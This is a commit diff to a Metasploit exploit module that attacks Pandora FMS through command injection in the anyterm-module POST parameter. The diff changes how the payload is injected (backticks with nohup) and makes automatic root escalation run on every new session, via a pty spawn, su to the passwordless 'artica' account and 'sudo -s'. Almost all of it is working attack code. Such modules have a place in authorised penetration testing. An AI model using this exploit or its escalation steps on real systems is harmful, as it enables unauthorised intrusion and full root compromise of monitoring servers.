Changes made to pandora_fms_exec module as requested

xistence · xistence · commit 50f860757bc3 · 2014-02-03T14:10:27.000+07:00
diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb
@@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerEcho
   include Msf::Exploit::EXE
 
   def initialize(info={})
@@ -55,24 +54,17 @@ def initialize(info={})
       [
        Opt::RPORT(8023),
        OptString.new('TARGETURI', [true, 'The base path to the Pandora instance', '/']),
-       OptBool.new('PRIVESC', [true, 'Try to escalate privileges to root', false])
       ], self.class)
   end
 
   def on_new_session(client)
-    if datastore['PRIVESC'] == true
-      print_status("#{peer} - Trying to escalate privileges to root")
-      # Spawn a pty for su/sudo
-      client.shell_command_token("python -c 'import pty;pty.spawn(\"/bin/sh\")'")
-      # Su to the passwordless "artica" account
-      client.shell_command_token("su - artica")
-      # The "artica" use has sudo rights without the need for a password, thus gain root priveleges
-      client.shell_command_token("sudo -s")
-    end
-  end
-
-  def uri
-    return target_uri.path
+    print_status("#{peer} - Trying to escalate privileges to root")
+    # Spawn a pty for su/sudo
+    client.shell_command_token("python -c 'import pty;pty.spawn(\"/bin/sh\")'")
+    # Su to the passwordless "artica" account
+    client.shell_command_token("su - artica")
+    # The "artica" use has sudo rights without the need for a password, thus gain root priveleges
+    client.shell_command_token("sudo -s")
   end
 
   def peer
@@ -85,12 +77,12 @@ def check
 
     res = send_request_cgi({
      'method' => 'GET',
-     'uri'    => normalize_uri(uri, "anyterm.html")
+     'uri'    => normalize_uri(target_uri.path, "anyterm.html")
     })
 
     if res and res.code == 200 and res.body =~ /Pandora FMS Remote Gateway/
       print_good("#{peer} - Pandora FMS Remote Gateway Detected!")
-      return Exploit::CheckCode::Unknown
+      return Exploit::CheckCode::Detected
     end
 
     return Exploit::CheckCode::Safe
@@ -100,10 +92,10 @@ def exploit
     print_status("#{peer} - Sending payload")
     res = send_request_cgi({
       'method' => 'POST',
-      'uri'    => normalize_uri(uri, "/anyterm-module"),
+      'uri'    => normalize_uri(target_uri.path, "/anyterm-module"),
       'vars_post'   => {
         'a'     => "open",
-        'p' => "`#{payload.raw}`"
+        'p' => "`nohup #{payload.encoded}`"
       }
     })
 
